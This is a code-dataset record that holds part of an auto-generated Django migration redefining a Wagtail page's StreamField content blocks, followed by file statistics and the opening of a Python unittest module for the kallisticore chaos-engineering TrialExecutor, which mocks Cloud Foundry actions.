wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock())))), ('table_block', common.blocks.table.CustomTableBlock()), ('calender_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('source', wagtail.wagtailcore.blocks.CharBlock(help_text='Such as: calendar@cos.io. You can also change the style of calendar block.', max_length=255, required=True))))), ('journal_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('participating journals', 'participating journals'), ('eligible journals', 'eligible journals'), ('journals signatory', 'journals signatory')], default='participating journals'))))), ('render_file', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('file_link', wagtail.wagtailcore.blocks.CharBlock(help_text='Full link to the file on the OSF', max_length=255, required=True))))), ('sponsor_partner_block', wagtail.wagtailcore.blocks.StructBlock((('displayChoice', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('sponsors', 'sponsors'), ('partners', 'partners')], default='sponsors')),))), ('collapse_block', wagtail.wagtailcore.blocks.StructBlock((('title', wagtail.wagtailcore.blocks.CharBlock()), ('list', common.blocks.collapsebox.CollapseBoxListBlock())))), ('button', wagtail.wagtailcore.blocks.StructBlock((('css_style', 
wagtail.wagtailcore.blocks.CharBlock(required=False)), ('description', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)), ('link', wagtail.wagtailcore.blocks.URLBlock(max_length=255, required=True)))))), blank=True, null=True),
),
# Auto-generated Django migration operation (makemigrations output): re-serializes
# the CustomPage.content StreamField block definitions. NOTE(review): here the
# 'button' block's 'link' field is a plain CharBlock (not URL-validated) —
# machine-generated serialization; do not hand-edit.
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabs', wagtail.wagtailcore.blocks.StructBlock((('tab_list', common.blocks.tabs.TabListBlock()), ('tabs_style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('vertical', 'Vertical'), ('horizontal', 'Horizontal')], default='horizontal'))))), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'Small'), ('max-width:225px;max-height:145px;padding-top:20px', 'Small Pushed Down 20px'), ('max_width:250px;max-height:250px', 'Medium'), ('max_width:250px;max-height:250px;padding-top:20px', 'Medium Pushed Down 20px'), ('height:auto', 'Shrink to Fit')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('customImage', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', 
wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise-team')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('text', wagtail.wagtailcore.blocks.RichTextBlock())))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),)))))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('height', wagtail.wagtailcore.blocks.IntegerBlock())))), ('clear_fixblock', 
wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock())))), ('table_block', common.blocks.table.CustomTableBlock()), ('calender_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('source', wagtail.wagtailcore.blocks.CharBlock(help_text='Such as: calendar@cos.io. You can also change the style of calendar block.', max_length=255, required=True))))), ('journal_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('participating journals', 'participating journals'), ('eligible journals', 'eligible journals'), ('journals signatory', 'journals signatory')], default='participating journals'))))), ('render_file', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('file_link', wagtail.wagtailcore.blocks.CharBlock(help_text='Full link to the file on the OSF', max_length=255, required=True))))), ('sponsor_partner_block', wagtail.wagtailcore.blocks.StructBlock((('displayChoice', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('sponsors', 'sponsors'), ('partners', 'partners')], default='sponsors')),))), ('collapse_block', wagtail.wagtailcore.blocks.StructBlock((('title', wagtail.wagtailcore.blocks.CharBlock()), ('list', common.blocks.collapsebox.CollapseBoxListBlock())))), ('button', wagtail.wagtailcore.blocks.StructBlock((('css_style', 
wagtail.wagtailcore.blocks.CharBlock(required=False)), ('description', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)), ('link', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)))))), blank=True, null=True),
),
# Auto-generated Django migration operation (makemigrations output): re-serializes
# the CustomPage.content StreamField block definitions. NOTE(review): in this
# revision the 'appeal' block's 'content' field is a RichTextBlock (no max_length)
# instead of a TextBlock — machine-generated serialization; do not hand-edit.
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.RichTextBlock(required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabs', wagtail.wagtailcore.blocks.StructBlock((('tab_list', common.blocks.tabs.TabListBlock()), ('tabs_style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('vertical', 'Vertical'), ('horizontal', 'Horizontal')], default='horizontal'))))), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'Small'), ('max-width:225px;max-height:145px;padding-top:20px', 'Small Pushed Down 20px'), ('max_width:250px;max-height:250px', 'Medium'), ('max_width:250px;max-height:250px;padding-top:20px', 'Medium Pushed Down 20px'), ('height:auto', 'Shrink to Fit')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('customImage', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), 
('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise-team')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('text', wagtail.wagtailcore.blocks.RichTextBlock())))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),)))))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('height', wagtail.wagtailcore.blocks.IntegerBlock())))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock((('css_style', 
wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock())))), ('table_block', common.blocks.table.CustomTableBlock()), ('calender_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('source', wagtail.wagtailcore.blocks.CharBlock(help_text='Such as: calendar@cos.io. You can also change the style of calendar block.', max_length=255, required=True))))), ('journal_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('participating journals', 'participating journals'), ('eligible journals', 'eligible journals'), ('journals signatory', 'journals signatory')], default='participating journals'))))), ('render_file', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('file_link', wagtail.wagtailcore.blocks.CharBlock(help_text='Full link to the file on the OSF', max_length=255, required=True))))), ('sponsor_partner_block', wagtail.wagtailcore.blocks.StructBlock((('displayChoice', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('sponsors', 'sponsors'), ('partners', 'partners')], default='sponsors')),))), ('collapse_block', wagtail.wagtailcore.blocks.StructBlock((('title', wagtail.wagtailcore.blocks.CharBlock()), ('list', common.blocks.collapsebox.CollapseBoxListBlock())))), ('button', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('description', 
wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)), ('link', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)))))), blank=True, null=True),
),
migrations.AddField(
model_name='custompage',
name='menu_order',
field=models.IntegerField(blank=True, default=1, help_text='The order this page should appear in the menu. The lower the number, the more left the page will appear. This is required for all pages where "Show in menus" is checked.'),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.RichTextBlock(required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabs', wagtail.wagtailcore.blocks.StructBlock((('tab_list', common.blocks.tabs.TabListBlock()), ('tabs_style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('vertical', 'Vertical'), ('horizontal', 'Horizontal')], default='horizontal'))))), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'Small'), ('max-width:225px;max-height:145px;padding-top:20px', 'Small Pushed Down 20px'), ('max_width:250px;max-height:250px', 'Medium'), ('max_width:250px;max-height:250px;padding-top:20px', 'Medium Pushed Down 20px'), ('height:auto', 'Shrink to Fit')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('customImage', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), 
('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise-team')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('text', wagtail.wagtailcore.blocks.RichTextBlock())))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RawHTMLBlock(required=True)), ('image_display_setting', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('background', 'Cover the whole Hero as a background'), ('icon', 'Center the image in the middle of the hero block')])), ('text_color', wagtail.wagtailcore.blocks.CharBlock(help_text='Enter a color for the text.'))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),)))))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('embed_block', 
wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('height', wagtail.wagtailcore.blocks.IntegerBlock())))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock())))), ('table_block', common.blocks.table.CustomTableBlock()), ('calender_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('source', wagtail.wagtailcore.blocks.CharBlock(help_text='Such as: calendar@cos.io. 
You can also change the style of calendar block.', max_length=255, required=True))))), ('journal_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('participating journals', 'participating journals'), ('eligible journals', 'eligible journals'), ('journals signatory', 'journals signatory')], default='participating journals'))))), ('render_file', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('file_link', wagtail.wagtailcore.blocks.CharBlock(help_text='Full link to the file on the OSF', max_length=255, required=True))))), ('sponsor_partner_block', wagtail.wagtailcore.blocks.StructBlock((('displayChoice', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('sponsors', 'sponsors'), ('partners', 'partners')], default='sponsors')),))), ('collapse_block', wagtail.wagtailcore.blocks.StructBlock((('title', wagtail.wagtailcore.blocks.CharBlock()), ('list', common.blocks.collapsebox.CollapseBoxListBlock())))), ('button', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('description', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)), ('link', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)))))), blank=True, null=True),
),
]
| 351.493069
| 16,882
| 0.729223
| 19,002
| 177,504
| 6.726555
| 0.029681
| 0.216026
| 0.277895
| 0.131985
| 0.95891
| 0.956336
| 0.945023
| 0.94022
| 0.94022
| 0.936613
| 0
| 0.016396
| 0.073655
| 177,504
| 504
| 16,883
| 352.190476
| 0.760944
| 0.000383
| 0
| 0.622222
| 1
| 0.008081
| 0.266202
| 0.043374
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.030303
| 0
| 0.040404
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
a766d6695c40ddd18b7e85546f4f45d64e73b489
| 41,005
|
py
|
Python
|
tests/kallisticore/lib/test_trial_executor.py
|
jpmorganchase/kallisti-core
|
d9dfcaa2ec3c9cd26dd37b5f2c39c3788a3d05aa
|
[
"Apache-2.0"
] | 1
|
2022-03-03T14:27:25.000Z
|
2022-03-03T14:27:25.000Z
|
tests/kallisticore/lib/test_trial_executor.py
|
jpmorganchase/kallisti-core
|
d9dfcaa2ec3c9cd26dd37b5f2c39c3788a3d05aa
|
[
"Apache-2.0"
] | null | null | null |
tests/kallisticore/lib/test_trial_executor.py
|
jpmorganchase/kallisti-core
|
d9dfcaa2ec3c9cd26dd37b5f2c39c3788a3d05aa
|
[
"Apache-2.0"
] | 1
|
2022-03-09T05:57:55.000Z
|
2022-03-09T05:57:55.000Z
|
import uuid
from unittest import mock
from unittest.mock import Mock, ANY, call
from django.conf import settings
from django.test import TestCase
from django.utils import timezone
from kallisticore import signals
from kallisticore.lib.observe.observer import Observer
from kallisticore.lib.trial_executor import TrialExecutor, execute_trial
from kallisticore.models import Experiment
from kallisticore.models.step import Step
from kallisticore.models.trial import Trial, TrialStatus
from kallisticore.signals import execute_plan_for_trial
def create_experiment_and_trial(parameters, steps, pre_steps=None,
                                post_steps=None, runtime_parameters=None):
    """Create an Experiment and a Trial for it without starting execution.

    The ``execute_plan_for_trial`` post-save receiver is detached while the
    Trial row is saved, so building the fixture does not kick off a real
    plan run; the receiver is re-attached before returning.

    :param parameters: experiment-level parameter dict.
    :param steps: raw step definitions for the experiment.
    :param pre_steps: optional raw pre-step definitions.
    :param post_steps: optional raw post-step definitions.
    :param runtime_parameters: optional trial-level parameter overrides.
    :return: the newly created Trial.
    """
    unique_name = 'some-experiment-' + str(uuid.uuid4())
    # Detach the receiver so that Trial.create below is inert.
    signals.post_save.disconnect(execute_plan_for_trial, sender=Trial)
    experiment = Experiment.create(
        name=unique_name,
        parameters=parameters,
        pre_steps=Step.convert_to_steps(pre_steps or []),
        steps=Step.convert_to_steps(steps),
        post_steps=Step.convert_to_steps(post_steps or []),
    )
    trial = Trial.create(experiment=experiment,
                         parameters=(runtime_parameters or {}))
    # Restore the receiver for code that relies on the signal.
    signals.post_save.connect(execute_plan_for_trial, sender=Trial)
    return trial
class TestTrialExecutor(TestCase):
    """Base fixture shared by the TrialExecutor test scenarios.

    Holds the dotted patch-target paths used with ``mock.patch`` in the
    subclasses and, in ``setUp``, builds a default trial whose steps look
    up a Cloud Foundry app and org.
    """

    # Maps the 'cf' step namespace to the module implementing its actions.
    module_map = {'cf': 'kallisticore.modules.cloud_foundry'}
    # Dotted paths patched by the scenario subclasses.
    LOG_REC = 'kallisticore.lib.trial_executor.TrialLogRecord'
    STEP_REC = 'kallisticore.lib.trial_executor.TrialStepLogRecord'
    COMMIT = 'kallisticore.lib.trial_executor.TrialLogRecorder.commit'
    CF_GET_APP = 'chaoscf.api.get_app_by_name'
    CF_GET_ORG = 'chaoscf.api.get_org_by_name'
    CF_STOP_APP = 'chaoscf.actions.stop_app'
    CF_START_APP = 'chaoscf.actions.start_app'
    CF_EXEC = 'kallisticore.modules.cloud_foundry.cloud_foundry_action.'\
        'CloudFoundryAction.execute'

    def setUp(self):
        """Create templated step definitions, their pre-populated expected
        counterparts, and a default trial over the CF lookup steps."""
        self.app_name = 'hello-world'
        self.org = 'MY-ORG'
        self.cf_api_url = 'https://cf-api.test'
        self.health_endpoint = 'https://health-check.test/health'
        self.parameters = {'cf_org': self.org,
                           'app_name': self.app_name,
                           'cf_api_url': self.cf_api_url}
        # Steps below use '{{ ... }}' placeholders that the executor is
        # expected to interpolate from experiment/trial parameters.
        self.pre_step_health_check = {
            'step': 'HTTP pre health check',
            'do': 'cm.http_probe',
            'where': {
                'url': '{{ health_endpoint }}'
            }}
        self.step_get_app_by_name = {
            'step': 'Get CF App by Name',
            'do': 'cf.get_app_by_name',
            'where': {
                'cf_api_url': '{{ cf_api_url }}',
                'app_name': '{{ app_name }}',
            }}
        self.step_get_org_by_name = {
            'step': 'Get CF Org by Name',
            'do': 'cf.get_org_by_name',
            'where': {
                'cf_api_url': '{{ cf_api_url }}',
                'org_name': '{{ cf_org }}',
            }}
        self.post_step_health_check = {
            'step': 'HTTP health check',
            'do': 'cm.http_probe',
            'where': {
                'url': '{{health_endpoint}}'
            }}
        self.steps = [self.step_get_app_by_name,
                      self.step_get_org_by_name]
        self.pre_steps = [self.pre_step_health_check]
        self.post_steps = [self.post_step_health_check]
        # 'Populated' variants: the same steps with placeholders already
        # substituted; used as expected values in log assertions.
        self.populated_step_get_app_by_name = {
            'step': 'Get CF App by Name',
            'do': 'cf.get_app_by_name',
            'where': {
                'cf_api_url': self.cf_api_url,
                'app_name': self.app_name,
            }}
        self.populated_step_get_org_by_name = {
            'step': 'Get CF Org by Name',
            'do': 'cf.get_org_by_name',
            'where': {
                'cf_api_url': self.cf_api_url,
                'org_name': self.org,
            }}
        self.populated_pre_step_health_check = {
            'step': 'HTTP pre health check',
            'do': 'cm.http_probe',
            'where': {
                'url': self.health_endpoint
            }}
        self.populated_post_step_health_check = {
            'step': 'HTTP health check',
            'do': 'cm.http_probe',
            'where': {
                'url': self.health_endpoint
            }}
        self._populated_steps = [self.populated_step_get_app_by_name,
                                 self.populated_step_get_org_by_name]
        self._populated_pre_steps = [self.populated_pre_step_health_check]
        self._populated_post_steps = [self.populated_post_step_health_check]
        # Keep the execution signal detached for the duration of each test;
        # tearDown re-attaches it.
        signals.post_save.disconnect(execute_plan_for_trial, sender=Trial)
        self._trial = create_experiment_and_trial(self.parameters, self.steps)

    def tearDown(self):
        """Re-attach the execution signal disconnected in setUp."""
        signals.post_save.connect(execute_plan_for_trial, sender=Trial)
class TestTrialLogRecorderSetup(TestTrialExecutor):
    """Verify that entering the TrialExecutor context wires up logging."""

    def test_context_enter_sets_up_trial_log_recorder(self):
        """``__enter__`` must build a TrialLogRecorder keyed by trial id."""
        recorder_path = 'kallisticore.lib.trial_executor.TrialLogRecorder'
        with mock.patch(recorder_path) as recorder_cls:
            TrialExecutor(self._trial, {}, {}).__enter__()
            recorder_cls.assert_called_once_with(self._trial.id)
class TestTrialRunScenarioStepsSucceeded(TestTrialExecutor):
    """Scenarios where every step succeeds: the trial must end SUCCEEDED,
    record the executed time, and log each step's start/result/completion.

    NOTE(review): status assertions sit after the ``with`` blocks — the
    final status appears to be set on executor ``__exit__`` (compare
    test_set_status_to_in_progress_at_run, which never exits the context).
    """

    def test_execute_all_commands(self):
        """Each configured CF action is invoked exactly once with the
        interpolated keyword arguments."""
        with mock.patch(self.CF_GET_APP) as app_action, \
                mock.patch(self.CF_GET_ORG) as org_action, \
                TrialExecutor(self._trial, self.module_map,
                              {}) as trial_executor:
            trial_executor.run()
        app_action.assert_called_once_with(app_name="hello-world",
                                           configuration=ANY, secrets=ANY)
        org_action.assert_called_once_with(org_name="MY-ORG",
                                           configuration=ANY, secrets=ANY)

    def test_set_status_to_in_progress_at_run(self):
        """Without exiting the context, run() leaves status IN_PROGRESS."""
        executor = TrialExecutor(self._trial, self.module_map, {})
        with mock.patch(self.CF_GET_APP), mock.patch(self.CF_GET_ORG):
            executor.__enter__()
            executor.run()
        self.assertEqual(self._trial.status, TrialStatus.IN_PROGRESS.value)

    def test_set_status_to_successful(self):
        """After context exit a clean run is marked SUCCEEDED."""
        with mock.patch(self.CF_GET_APP), mock.patch(self.CF_GET_ORG), \
                TrialExecutor(self._trial, self.module_map,
                              {}) as trial_executor:
            trial_executor.run()
        self.assertEqual(self._trial.status, TrialStatus.SUCCEEDED.value)

    def test_update_executed_at_to_date_time_object(self):
        """run() stamps executed_at with a datetime."""
        with mock.patch(self.CF_GET_APP), mock.patch(self.CF_GET_ORG), \
                TrialExecutor(self._trial, self.module_map,
                              {}) as trial_executor:
            trial_executor.run()
        self.assertIsInstance(self._trial.executed_at, timezone.datetime)

    def test_log_trial_with_parameter_interpolation(self):
        """Step logs must show the interpolated (populated) 'where' dicts
        when the steps were defined with '{{ ... }}' placeholders."""
        with mock.patch(self.LOG_REC) as mock_log_rec_cls, \
                mock.patch(self.STEP_REC) as mock_step_rec_cls, \
                mock.patch(self.COMMIT) as mock_rec_commit, \
                mock.patch(self.CF_GET_APP) as app_cmd_mock, \
